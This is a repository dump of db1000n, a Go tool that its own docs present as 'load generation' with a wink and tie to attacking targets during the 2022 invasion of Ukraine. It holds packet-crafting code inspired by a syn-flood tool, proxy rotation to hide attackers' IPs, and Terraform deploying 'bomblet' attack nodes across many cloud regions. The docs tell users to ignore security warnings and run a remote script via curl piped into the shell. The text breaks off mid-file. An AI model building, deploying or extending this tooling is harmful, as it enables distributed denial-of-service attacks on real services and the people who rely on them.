53 | } 54 | 55 | func Serialize(payloadBuf gopacket.SerializeBuffer, layer gopacket.Layer) error { 56 | serializable, err := toSerializable(layer) 57 | if err != nil { 58 | return err 59 | } 60 | 61 | return serializable.SerializeTo(payloadBuf, opts) 62 | } 63 | 64 | func toSerializable(layer gopacket.Layer) (gopacket.SerializableLayer, error) { 65 | serializable, ok := layer.(gopacket.SerializableLayer) 66 | if !ok { 67 | return nil, fmt.Errorf("layer is not serializable: %v", layer.LayerType()) 68 | } 69 | 70 | return serializable, nil 71 | } 72 | -------------------------------------------------------------------------------- /src/core/packetgen/link.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 
22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | "github.com/google/gopacket/layers" 31 | 32 | "github.com/Arriven/db1000n/src/utils" 33 | ) 34 | 35 | // BuildLinkLayer builds the configured link layer; an empty type yields nil with no error. 36 | func BuildLinkLayer(c LayerConfig) (gopacket.LinkLayer, error) { 37 | switch c.Type { 38 | case "": 39 | return nil, nil 40 | case "ethernet": 41 | var packetConfig EthernetPacketConfig 42 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 43 | return nil, err 44 | } 45 | 46 | return buildEthernetPacket(packetConfig) 47 | default: 48 | return nil, fmt.Errorf("unsupported link layer type %s", c.Type) 49 | } 50 | } 51 | 52 | // EthernetPacketConfig describes ethernet layer configuration 53 | type EthernetPacketConfig struct { 54 | SrcMAC string 55 | DstMAC string 56 | } 57 | 58 | // buildEthernetPacket generates a layers.Ethernet with the given source and destination MAC addresses. 59 | // MAC strings are parsed with net.ParseMAC: a direct string-to-net.HardwareAddr conversion would copy 60 | // the raw ASCII bytes of the text (e.g. '0', '0', ':', ...) instead of the six address octets, and 61 | // indexing bytes 0-5 of a too-short string would panic. 62 | func buildEthernetPacket(c EthernetPacketConfig) (*layers.Ethernet, error) { 63 | srcMac, err := net.ParseMAC(c.SrcMAC) 64 | if err != nil { 65 | return nil, fmt.Errorf("invalid source MAC %q: %w", c.SrcMAC, err) 66 | } 67 | 68 | dstMac, err := net.ParseMAC(c.DstMAC) 69 | if err != nil { 70 | return nil, fmt.Errorf("invalid destination MAC %q: %w", c.DstMAC, err) 71 | } 72 | 73 | return &layers.Ethernet{ 74 | SrcMAC: srcMac, 75 | DstMAC: dstMac, 76 | }, nil 77 | } 78 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # For most projects, this workflow file will not need changing; you simply need 2 | # to commit it to your repository. 3 | # 4 | # You may wish to alter this file to override the set of languages analyzed, 5 | # or to provide custom queries or build logic. 6 | # 7 | # ******** NOTE ******** 8 | # We have attempted to detect the languages in your repository. 
Please check 9 | # the `language` matrix defined below to confirm you have the correct set of 10 | # supported CodeQL languages. 11 | # 12 | name: "CodeQL" 13 | 14 | on: 15 | push: 16 | branches: [ main, gh-pages ] 17 | pull_request: 18 | # The branches below must be a subset of the branches above 19 | branches: [ main ] 20 | schedule: 21 | - cron: '44 12 * * 3' 22 | 23 | jobs: 24 | analyze: 25 | name: Analyze 26 | runs-on: ubuntu-latest 27 | permissions: 28 | actions: read 29 | contents: read 30 | security-events: write 31 | 32 | strategy: 33 | fail-fast: false 34 | matrix: 35 | language: [ 'go' ] 36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] 37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support 38 | 39 | steps: 40 | - name: Checkout repository 41 | uses: actions/checkout@v3 42 | 43 | # Initializes the CodeQL tools for scanning. 44 | - name: Initialize CodeQL 45 | uses: github/codeql-action/init@v1 46 | with: 47 | languages: ${{ matrix.language }} 48 | # If you wish to specify custom queries, you can do so here or in a config file. 49 | # By default, queries listed here will override any specified in a config file. 50 | # Prefix the list here with "+" to use these queries and those in the config file. 51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main 52 | 53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). 54 | # If this step fails, then you should remove it and run the build manually (see below) 55 | - name: Autobuild 56 | uses: github/codeql-action/autobuild@v1 57 | 58 | # ℹ️ Command-line programs to run using the OS shell. 
59 | # 📚 https://git.io/JvXDl 60 | 61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines 62 | # and modify them (or add more) to build your code if your project 63 | # uses a compiled language 64 | 65 | #- run: | 66 | # make bootstrap 67 | # make release 68 | 69 | - name: Perform CodeQL Analysis 70 | uses: github/codeql-action/analyze@v1 71 | -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | # Quick start 2 | 3 | ## Death by 1000 needles 4 | 5 | On 24th of February Russia has launched a full-blown invasion on Ukrainian territory. We're doing our best to stop it and prevent innocent lives being taken 6 | 7 | !!! attention 8 | 9 | Please check existing issues (both open and closed) before creating new ones. It will save me some time answering duplicated questions and right now time is the most critical resource. Regards. 10 | 11 | --- 12 | 13 | ## Quickstart guide 14 | 15 | !!! attention 16 | 17 | This tool is responsible only for traffic generation, you may want to use VPN if you want to test geo-blocking 18 | 19 | ### For dummies 20 | 21 | 1. Download an application for your platform: 22 | 23 | - [Windows](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_windows_386.zip) 24 | - [Mac M1](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_darwin_arm64.tar.gz) 25 | - [Mac Intel](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_darwin_amd64.tar.gz) 26 | - [Linux 32bit](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_386.zip) 27 | - [Linux 64bit](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_amd64.tar.gz) 28 | 29 | 1. Unpack the archive 30 | 1. Launch the file inside the archive 31 | 1. Done! 32 | 33 | !!! 
important 34 | 35 | Cloud providers could charge a huge amount of money not only for compute resources but for traffic as well. If you run an app in the cloud please control your billing (only advanced users are affected)! 36 | 37 | !!! info 38 | 39 | You can get warnings from your computer about the file - ignore them (or allow in System Settings). Our software is open source. It can be checked and compiled by you yourself. 40 | 41 | --- 42 | 43 | ## How to install db1000n 44 | 45 | There are different ways to install and run `db1000n` 46 | 47 | ### Binary file 48 | 49 | Download the [latest release](https://github.com/Arriven/db1000n/releases/latest) for your arch/OS. 50 | Unpack the archive and run it 51 | 52 | ### Docker 53 | 54 | If you already have installed Docker, just run: 55 | 56 | ```bash 57 | docker run --rm -it --pull always ghcr.io/arriven/db1000n 58 | ``` 59 | 60 | Or, if your container is not able to connect to your local VPN: 61 | 62 | ```bash 63 | docker run --rm -it --pull always --network host ghcr.io/arriven/db1000n 64 | ``` 65 | 66 | ### Advanced users 67 | 68 | See [For advanced](/db1000n/advanced-docs/advanced-and-devs/) 69 | 70 | --- 71 | 72 | ## I still have questions 73 | 74 | You will find some answers on our [FAQ](/db1000n/faq/) 75 | 76 | --- 77 | -------------------------------------------------------------------------------- /terraform/azure/main.tf: -------------------------------------------------------------------------------- 1 | provider "azurerm" { 2 | features {} 3 | } 4 | 5 | resource "azurerm_resource_group" "main" { 6 | name = "${var.prefix}-rg" 7 | location = "northeurope" 8 | } 9 | 10 | module "bomblet" { 11 | source = "./bomblet" 12 | 13 | bomblet_count = var.bomblet_count 14 | region = "northeurope" 15 | prefix = var.prefix 16 | resource_group_name = azurerm_resource_group.main.name 17 | attack_commands = var.attack_commands 18 | attack_environment_variables = var.attack_environment_variables 19 | } 20 | 21 | module 
"bomblet_we" { 22 | source = "./bomblet" 23 | 24 | bomblet_count = var.bomblet_count 25 | region = "westeurope" 26 | prefix = var.prefix 27 | resource_group_name = azurerm_resource_group.main.name 28 | attack_commands = var.attack_commands 29 | attack_environment_variables = var.attack_environment_variables 30 | } 31 | 32 | module "bomblet_cc" { 33 | source = "./bomblet" 34 | 35 | bomblet_count = var.bomblet_count 36 | region = "canadacentral" 37 | prefix = var.prefix 38 | resource_group_name = azurerm_resource_group.main.name 39 | attack_commands = var.attack_commands 40 | attack_environment_variables = var.attack_environment_variables 41 | } 42 | 43 | module "bomblet_uae" { 44 | source = "./bomblet" 45 | 46 | bomblet_count = var.bomblet_count 47 | region = "uaenorth" 48 | prefix = var.prefix 49 | resource_group_name = azurerm_resource_group.main.name 50 | attack_commands = var.attack_commands 51 | attack_environment_variables = var.attack_environment_variables 52 | } 53 | 54 | module "bomblet_cu" { 55 | source = "./bomblet" 56 | 57 | bomblet_count = var.bomblet_count 58 | region = "centralus" 59 | prefix = var.prefix 60 | resource_group_name = azurerm_resource_group.main.name 61 | attack_commands = var.attack_commands 62 | attack_environment_variables = var.attack_environment_variables 63 | } 64 | 65 | module "bomblet_ea" { 66 | source = "./bomblet" 67 | 68 | bomblet_count = var.bomblet_count 69 | region = "eastasia" 70 | prefix = var.prefix 71 | resource_group_name = azurerm_resource_group.main.name 72 | attack_commands = var.attack_commands 73 | attack_environment_variables = var.attack_environment_variables 74 | } 75 | -------------------------------------------------------------------------------- /docs/advanced-docs/advanced-and-devs.md: -------------------------------------------------------------------------------- 1 | # Advanced and devs 2 | 3 | ## For developers 4 | 5 | _Developed by [Arriven](https://github.com/Arriven)._ 6 | 7 | This is a simple 
distributed load generation client written in go. 8 | It is able to fetch simple json config from a local or remote location. 9 | The config describes which load generation jobs should be launched in parallel. 10 | There are other tools doing that. 11 | I do not intend to copy or replace them but rather provide a simple open source alternative so that users have more options. 12 | Feel free to use it in your load tests (wink-wink). 13 | 14 | The software is provided as is under no guarantee. 15 | I will update both the repo and this doc as I go during following days (date of writing this is 26th of February 2022, third day of Russian invasion into Ukraine). 16 | 17 | ## Go installation 18 | 19 | Run command in your terminal: 20 | 21 | ```bash 22 | go install github.com/Arriven/db1000n@latest 23 | ~/go/bin/db1000n 24 | ``` 25 | 26 | ## Shell installation 27 | 28 | Run install script directly into the shell (useful for installation through SSH): 29 | 30 | ```bash 31 | source <(curl https://raw.githubusercontent.com/Arriven/db1000n/main/install.sh) 32 | ``` 33 | 34 | The command above will detect the OS and architecture, download the archive, validate it, and extract `db1000n` executable into the working directory. 
35 | You can run it via this command: 36 | 37 | ```bash 38 | ./db1000n 39 | ``` 40 | 41 | ## Docker + OpenVPN 42 | 43 | How to install docker: [https://docs.docker.com/get-docker/](https://docs.docker.com/get-docker/) 44 | 45 | Make sure you've set all available resources to docker: 46 | 47 | - [Windows](https://docs.docker.com/desktop/windows/#resources) 48 | - [Mac](https://docs.docker.com/desktop/mac/#resources) 49 | - [Linux](https://docs.docker.com/desktop/linux/#resources) 50 | 51 | See [docker-vpn](docker-vpn.md) for instructions on setting it up 52 | 53 | ## Kubernetes 54 | 55 | Here are possible ways to deploy into it 56 | 57 | - [Helm Chart](/db1000n/advanced-docs/kubernetes/helm-charts/) 58 | - [Manifest](/db1000n/advanced-docs/kubernetes/manifests/) 59 | 60 | ## Public Clouds 61 | 62 | See possible ways to deploy into public clouds 63 | 64 | - [AWS](/db1000n/advanced-docs/terraform/aws/) 65 | - [Azure](/db1000n/advanced-docs/terraform/azure/) 66 | - [Digital Ocean](/db1000n/advanced-docs/terraform/digital-ocean/) 67 | - [Google Cloud Platform](/db1000n/advanced-docs/terraform/gcp/) 68 | - [Heroku](/db1000n/advanced-docs/terraform/heroku/) 69 | 70 | ## See also 71 | 72 | - [db1000nX100](https://github.com/ihorlv/db1000nX100) - a project that automates VPN rotation for db1000n instances that allows you to generate geographically distributed traffic (i.e. 
to stress test geo-blocking) 73 | -------------------------------------------------------------------------------- /src/utils/proxy.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "math/rand" 7 | "net" 8 | "net/url" 9 | "strings" 10 | "time" 11 | 12 | "github.com/valyala/fasthttp/fasthttpproxy" 13 | "golang.org/x/net/proxy" 14 | "h12.io/socks" 15 | ) 16 | 17 | type ProxyFunc func(network, addr string) (net.Conn, error) 18 | 19 | type ProxyParams struct { 20 | URLs string 21 | DefaultProto string 22 | LocalAddr string 23 | Interface string 24 | Timeout time.Duration 25 | } 26 | 27 | // this won't work for udp payloads but if people use proxies they might not want to have their ip exposed 28 | // so it's probably better to fail instead of routing the traffic directly 29 | func GetProxyFunc(ctx context.Context, params ProxyParams, protocol string) ProxyFunc { 30 | direct := &net.Dialer{Timeout: params.Timeout, LocalAddr: resolveAddr(protocol, params.LocalAddr), Control: BindToInterface(params.Interface)} 31 | if params.URLs == "" { 32 | return proxy.FromEnvironmentUsing(direct).Dial 33 | } 34 | 35 | proxies := strings.Fields(strings.ReplaceAll(params.URLs, ",", " ")) 36 | 37 | // We need to dial new proxy on each call 38 | return func(network, addr string) (net.Conn, error) { 39 | selected := proxies[rand.Intn(len(proxies))] //nolint:gosec // Cryptographically secure random not required 40 | 41 | u, err := url.Parse(selected) 42 | if err != nil { 43 | selected = params.DefaultProto + "://" + selected 44 | 45 | u, err = url.Parse(selected) 46 | if err != nil { 47 | return nil, fmt.Errorf("error building proxy %v: %w", selected, err) 48 | } 49 | } 50 | 51 | switch u.Scheme { 52 | case "socks5", "socks5h": 53 | client, err := proxy.FromURL(u, direct) 54 | if err != nil { 55 | return nil, fmt.Errorf("error building proxy %v: %w", u.String(), err) 56 | } 57 | 58 | return 
client.Dial(network, addr) 59 | case "socks4", "socks4a": 60 | return socks.Dial(u.String())(network, addr) 61 | default: 62 | // Not all http proxies support tunneling so it's safer to skip them for raw tcp payload 63 | if protocol == "http" { 64 | return fasthttpproxy.FasthttpHTTPDialerTimeout(u.Host, params.Timeout)(addr) 65 | } 66 | 67 | return nil, fmt.Errorf("unsupported proxy scheme %v", u.Scheme) 68 | } 69 | } 70 | } 71 | 72 | func resolveAddr(protocol, addr string) net.Addr { 73 | if addr == "" { 74 | return nil 75 | } 76 | 77 | var zone string 78 | 79 | // handle ipv6 zone 80 | if strings.Contains(addr, "%") { 81 | split := strings.Split(addr, "%") 82 | addr, zone = split[0], split[1] 83 | } 84 | 85 | ip := net.ParseIP(addr) 86 | 87 | switch protocol { 88 | case "tcp", "tcp4", "tcp6", "http": 89 | return &net.TCPAddr{IP: ip, Zone: zone} 90 | case "udp", "udp4", "udp6": 91 | return &net.UDPAddr{IP: ip, Zone: zone} 92 | default: 93 | return &net.IPAddr{IP: ip} 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /src/core/packetgen/packetgen.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 
14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | // Package packetgen [allows sending customized tcp/udp traffic. Inspired by https://github.com/bilalcaliskan/syn-flood] 24 | package packetgen 25 | 26 | import ( 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | ) 31 | 32 | // Common protocol header sizes to help with metrics 33 | const ( 34 | TCPHeaderSize = 25 // 20 for header + at least 5 for options 35 | UDPHeaderSize = 8 36 | IPHeaderSize = 20 37 | ) 38 | 39 | type Packet struct { 40 | Link gopacket.LinkLayer 41 | Network gopacket.NetworkLayer 42 | Transport gopacket.TransportLayer 43 | Payload gopacket.Layer 44 | } 45 | 46 | type LayerConfig struct { 47 | Type string 48 | Data map[string]any 49 | } 50 | 51 | type PacketConfig struct { 52 | Link LayerConfig 53 | Network LayerConfig 54 | Transport LayerConfig 55 | Payload LayerConfig 56 | } 57 | 58 | func (c PacketConfig) Build() (result Packet, err error) { 59 | if result.Link, err = BuildLinkLayer(c.Link); err != nil { 60 | return Packet{}, err 61 | } 62 | 63 | if result.Network, err = BuildNetworkLayer(c.Network); err != nil { 64 | return Packet{}, err 65 | } 66 | 67 | if result.Transport, err = BuildTransportLayer(c.Transport, result.Network); err != nil { 68 | return Packet{}, err 69 | } 70 | 71 | if result.Payload, err = BuildPayload(c.Payload); err != nil { 72 | return Packet{}, err 73 | } 74 | 75 | return result, nil 76 | } 77 | 78 | func (p Packet) Serialize(payloadBuf gopacket.SerializeBuffer) (err error) { 79 | return 
SerializeLayers(payloadBuf, p.Link, p.Network, p.Transport, p.Payload) 80 | } 81 | 82 | func (p Packet) IP() net.IP { 83 | return p.Network.NetworkFlow().Dst().Raw() 84 | } 85 | -------------------------------------------------------------------------------- /terraform/aws_eks/README.md: -------------------------------------------------------------------------------- 1 | # AWS EKS deployment 2 | 3 | ## Description 4 | 5 | This implementation allows you to create entire AWS infrastructure from scratch 6 | and provides Kubernetes cluster (EKS) to deploy **db1000n** project. 7 | 8 | ## Prerequisites 9 | 10 | - AWS account with **AdministratorAccess** permissions 11 | - OS Linux or Windows 12 | - [AWS CLI](https://docs.aws.amazon.com/cli/v1/userguide/cli-chap-install.html) 13 | - [Terraform](https://learn.hashicorp.com/tutorials/terraform/install-cli) 14 | - [Helm](https://helm.sh/docs/intro/install/) 15 | - [kubectl](https://kubernetes.io/docs/tasks/tools/) 16 | 17 | ## Configure AWS profile 18 | 19 | The following example shows sample values: 20 | 21 | ```bash 22 | $ aws configure 23 | AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE 24 | AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 25 | Default region name [None]: us-west-2 26 | Default output format [None]: json 27 | ``` 28 | 29 | ## Deployment 30 | 31 | ### Deploy infrastructure 32 | 33 | ```bash 34 | cd db1000n/terraform/aws/eks-cluster/ 35 | terraform init 36 | terraform plan 37 | terraform apply 38 | ``` 39 | 40 | **NOTE:** You can create multilpe `*.tfvars` configuration files with various variables, regions and AWS accounts 41 | using `terraform workspace` command: 42 | 43 | ```bash 44 | cd db1000n/terraform/aws/eks-cluster/ 45 | terraform init 46 | terraform workspace new $your_workspace 47 | terraform plan -var-file $your_file.tfvars 48 | terraform apply -var-file $your_file.tfvars 49 | ``` 50 | 51 | ### Update kubeconfig 52 | 53 | ```bash 54 | aws --profile $your_aws_profile eks 
update-kubeconfig --name $your_eks_cluster_name 55 | ``` 56 | 57 | ### Connect to EKS cluster 58 | 59 | ```bash 60 | $ kubectl get nodes 61 | NAME STATUS ROLES AGE VERSION 62 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 63 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 64 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 65 | ``` 66 | 67 | ### Install application 68 | 69 | ```bash 70 | $ cd db1000n/kubernetes/helm-charts/ 71 | $ helm upgrade --install \ 72 | --create-namespace \ 73 | --namespace=db1000n \ 74 | -f values.yaml db1000n . 75 | ``` 76 | 77 | ### Check installation 78 | 79 | ```bash 80 | $ kubectl -n db1000n get pods 81 | NAME READY STATUS RESTARTS AGE 82 | db1000n-54d8744b54-8hffr 1/1 Running 0 2m10s 83 | db1000n-54d8744b54-8vml4 1/1 Running 0 2m10s 84 | db1000n-54d8744b54-9stzv 1/1 Running 0 2m10s 85 | ``` 86 | 87 | ## Deletion 88 | 89 | ### Delete application 90 | 91 | ```bash 92 | helm uninstall db1000n -n db1000n 93 | ``` 94 | 95 | ### Delete infrastructure 96 | 97 | ```bash 98 | terraform destroy 99 | ``` 100 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/variables.tf: -------------------------------------------------------------------------------- 1 | variable "autoscale_group_name" { 2 | description = "Name to use for the auto scale group" 3 | } 4 | 5 | variable "cluster_name" { 6 | description = "EKS cluster name" 7 | } 8 | 9 | variable "cluster_version" { 10 | description = "EKS cluster version" 11 | } 12 | 13 | variable "cluster_endpoint" { 14 | description = "EKS cluster endpoint" 15 | } 16 | 17 | variable "cluster_ca_data" { 18 | description = "EKS cluster certificate authority" 19 | } 20 | 21 | variable "vpc_id" { 22 | description = "VPC ID" 23 | } 24 | 25 | variable "source_security_groups" { 26 | description = "A list of source security groups which can connect to the EKS nodes" 27 
| } 28 | 29 | variable "subnets" { 30 | description = "A list of subnets to place the EKS nodes" 31 | type = list(string) 32 | } 33 | 34 | variable "key_name" { 35 | description = "SSH key name" 36 | } 37 | 38 | variable "public_key" { 39 | description = "SSH public key" 40 | } 41 | 42 | variable "ami_id" { 43 | description = "The AMI from which to launch the instances" 44 | default = "" 45 | } 46 | 47 | variable "instance_type" { 48 | description = "The type of the instance" 49 | } 50 | 51 | variable "device_name" { 52 | description = "The name of the device to mount." 53 | default = "/dev/xvda" 54 | } 55 | 56 | variable "volume_type" { 57 | description = "The type of volume. Can be `standard`, `gp2`, or `io1`." 58 | default = "gp2" 59 | } 60 | 61 | variable "volume_size" { 62 | description = "The size of the volume in gigabytes." 63 | default = "20" 64 | } 65 | 66 | variable "encrypted" { 67 | description = "Enables EBS encryption on the volume." 68 | default = true 69 | } 70 | 71 | variable "desired_capacity" { 72 | description = "The number of Amazon EC2 instances that should be running in the auto scale group" 73 | } 74 | 75 | variable "max_size" { 76 | description = "The maximum size of the auto scale group" 77 | } 78 | 79 | variable "min_size" { 80 | description = "The minimum size of the auto scale group" 81 | } 82 | 83 | variable "on_demand_base_capacity" { 84 | description = "Auto Scaling Group desired capacity for on-demand lifecycle instances in the EKS node group." 85 | default = 0 86 | } 87 | 88 | variable "use_spot_instances" { 89 | description = "Use spot instances or on-demand" 90 | default = false 91 | } 92 | 93 | variable "spot_overrides" { 94 | description = "Instance type overrides. 
Only applicable with spot instances" 95 | type = list(object({ 96 | instance_type = string 97 | weighted_capacity = number 98 | })) 99 | default = [] 100 | } 101 | 102 | variable "termination_policies" { 103 | type = list(string) 104 | description = "A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are OldestInstance, NewestInstance, OldestLaunchConfiguration, ClosestToNextInstanceHour, OldestLaunchTemplate, AllocationStrategy." 105 | default = ["OldestInstance"] 106 | } -------------------------------------------------------------------------------- /src/utils/metrics/reporter.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "io" 7 | "text/tabwriter" 8 | 9 | "go.uber.org/zap" 10 | ) 11 | 12 | // Reporter gathers metrics across jobs and reports them. 13 | // Concurrency-safe. 14 | type Reporter interface { 15 | // WriteSummary dumps Reporter contents into the target. 16 | WriteSummary(*StatsTracker) 17 | } 18 | 19 | // ZapReporter 20 | 21 | type ZapReporter struct { 22 | logger *zap.Logger 23 | groupTargets bool 24 | } 25 | 26 | // NewZapReporter creates a new Reporter using a zap logger. 
27 | func NewZapReporter(logger *zap.Logger, groupTargets bool) Reporter { 28 | return &ZapReporter{logger: logger, groupTargets: groupTargets} 29 | } 30 | 31 | func (r *ZapReporter) WriteSummary(tracker *StatsTracker) { 32 | stats, totals, statsInterval, totalsInterval := tracker.sumStats(r.groupTargets) 33 | 34 | r.logger.Info("stats", zap.Object("total", &totals), zap.Object("targets", stats), 35 | zap.Object("total_since_last_report", &totalsInterval), zap.Object("targets_since_last_report", statsInterval)) 36 | } 37 | 38 | // ConsoleReporter 39 | 40 | type ConsoleReporter struct { 41 | target *bufio.Writer 42 | groupTargets bool 43 | } 44 | 45 | // NewConsoleReporter creates a new Reporter which outputs straight to the console 46 | func NewConsoleReporter(target io.Writer, groupTargets bool) Reporter { 47 | return &ConsoleReporter{target: bufio.NewWriter(target), groupTargets: groupTargets} 48 | } 49 | 50 | func (r *ConsoleReporter) WriteSummary(tracker *StatsTracker) { 51 | writer := tabwriter.NewWriter(r.target, 1, 1, 1, ' ', tabwriter.AlignRight) 52 | 53 | r.writeSummaryTo(tracker, writer) 54 | 55 | // Important to flush the remains of bufio.Writer 56 | r.target.Flush() 57 | } 58 | 59 | func (r *ConsoleReporter) writeSummaryTo(tracker *StatsTracker, writer *tabwriter.Writer) { 60 | stats, totals, statsInterval, totalsInterval := tracker.sumStats(r.groupTargets) 61 | 62 | defer writer.Flush() 63 | 64 | // Print table's header 65 | fmt.Fprintln(writer, "\n --- Traffic stats ---") 66 | fmt.Fprintf(writer, "|\tTarget\t|\tRequests attempted\t|\tRequests sent\t|\tResponses received\t|\tData sent\t|\tData received \t|\n") 67 | 68 | // Print all table rows 69 | for _, tgt := range stats.sortedTargets() { 70 | printStatsRow(writer, tgt, stats[tgt], statsInterval[tgt]) 71 | } 72 | 73 | // Print table's footer 74 | fmt.Fprintln(writer, "|\t---\t|\t---\t|\t---\t|\t---\t|\t---\t|\t--- \t|") 75 | printStatsRow(writer, "Total", totals, totalsInterval) 76 | 
fmt.Fprintln(writer) 77 | } 78 | 79 | func printStatsRow(writer *tabwriter.Writer, rowName string, stats Stats, diff Stats) { 80 | const BytesInMegabyte = 1024 * 1024 81 | 82 | fmt.Fprintf(writer, "|\t%s\t|\t%d/%d\t|\t%d/%d\t|\t%d/%d\t|\t%.2f MB/%.2f MB\t|\t%.2f MB/%.2f MB \t|\n", rowName, 83 | diff[RequestsAttemptedStat], stats[RequestsAttemptedStat], 84 | diff[RequestsSentStat], stats[RequestsSentStat], 85 | diff[ResponsesReceivedStat], stats[ResponsesReceivedStat], 86 | float64(diff[BytesSentStat])/BytesInMegabyte, float64(stats[BytesSentStat])/BytesInMegabyte, 87 | float64(diff[BytesReceivedStat])/BytesInMegabyte, float64(stats[BytesReceivedStat])/BytesInMegabyte, 88 | ) 89 | } 90 | -------------------------------------------------------------------------------- /src/utils/crypto.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bytes" 5 | "io" 6 | "runtime" 7 | "strings" 8 | "sync" 9 | 10 | "filippo.io/age" 11 | ) 12 | 13 | // EncryptionKeys random 32 byte key encoded into base64 string. 
Used by default for configs 14 | var EncryptionKeys = `/45pB920B6DFNwCB/n4rYUio3AVMawrdtrFnjTSIzL4=` 15 | 16 | var ProtectedKeys = `` 17 | 18 | // decryption takes a bunch of RAM to generate scrypt identity 19 | // we don't do decryption in hot paths so it's better to only allow one thread doing decryption at a time to avoi OOM 20 | var decryptMutex sync.Mutex 21 | 22 | const ( 23 | encryptionKeyEnvName = `ENCRYPTION_KEYS` 24 | keySeparator = `&` 25 | ) 26 | 27 | type encryptionKey struct { 28 | key string 29 | protected bool // indicates that the content encrypted by this key shouldn't be logged anywhere 30 | } 31 | 32 | // getEncryptionKeys returns list of encryption keys from ENCRYPTION_KEYS env variable name or default value 33 | func getEncryptionKeys() []encryptionKey { 34 | keysString := GetEnvStringDefault(encryptionKeyEnvName, EncryptionKeys) 35 | if keysString != EncryptionKeys { 36 | // if user specified own keys, add default at end to be sure that it always used too 37 | // to avoid manual copy/join default key to new 38 | keysString = keysString + keySeparator + EncryptionKeys 39 | } 40 | 41 | // +1 to allocate for case if no separator and list contains key itself 42 | // otherwise we just allocate +1 struct for string slice that stores just 2 int fields 43 | // that is not a lot 44 | output := make([]encryptionKey, 0, strings.Count(keysString, keySeparator)+strings.Count(ProtectedKeys, keySeparator)+1) 45 | 46 | for _, key := range strings.Split(keysString, keySeparator) { 47 | if key != "" { 48 | output = append(output, encryptionKey{key: key}) 49 | } 50 | } 51 | 52 | for _, key := range strings.Split(ProtectedKeys, keySeparator) { 53 | if key != "" { 54 | output = append(output, encryptionKey{key: key, protected: true}) 55 | } 56 | } 57 | 58 | return output 59 | } 60 | 61 | // IsEncrypted returns true if cfg encrypted with age tool (https://github.com/FiloSottile/age) 62 | func IsEncrypted(cfg []byte) bool { 63 | return bytes.Contains(cfg, 
